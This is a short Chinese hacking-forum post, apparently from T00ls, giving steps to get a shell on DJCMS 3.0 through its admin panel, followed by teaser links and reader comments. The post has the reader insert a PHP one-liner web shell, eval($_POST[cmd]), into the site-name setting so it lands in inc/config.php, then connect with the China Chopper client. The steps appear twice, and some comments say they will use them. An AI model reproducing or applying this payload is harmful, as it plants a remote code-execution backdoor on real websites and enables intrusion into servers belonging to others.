DJCMS 3.0后台拿shell
进入后台 在其它设置里 网站名称插入以下一句话

记住提交两次
");eval($_POST[cmd])?>
然后用菜刀连接
http://www.u.com/inc/config.php
by:xch40

记住提交两次
");eval($_POST[cmd])?>
然后用菜刀连接
http://www.u.com/inc/config.php
by:xch40
近日,从网络公开信息获悉,湖北省大冶市人民检察院将国内首例“ ...
大家好,我叫查鲁特(ID:X-ROOT),查鲁特由ID音译而成,不是我 ...
核攻击,一个在网络安全江湖中声名远扬的传奇人物,他仿佛是夜空 ...
图片引用自:netcraftIain-Thomson:犯罪分子已经掌握了一种误导 ...
本次实战中使用到了jsrpc+autoDecoder+v_jstools实现了JS无感自 ...
之前有个表哥(@lostwolf)说要让分享一下免杀技术,这不我发来了 ...
## 0x01 抓包### 1.1 burp抓包测试(抓不到)### 1.2 httpcanaryHt ...
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。当前正在使用CDN加速。
Copyright © 2008 - 2025 T00ls All Rights Reserved.
评论11次
观摩一下
本地测试后,后台程序就乱码了。。继续看看哪里的过滤问题。
mark!!
好吧 我表示我的两个站都是djcms
收下了
- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,
收下、、、、、
这算是提交参数的时候没有进行过滤的漏洞吗?
和DZ很类似
强烈支持原创
1943 神秘小强 本人?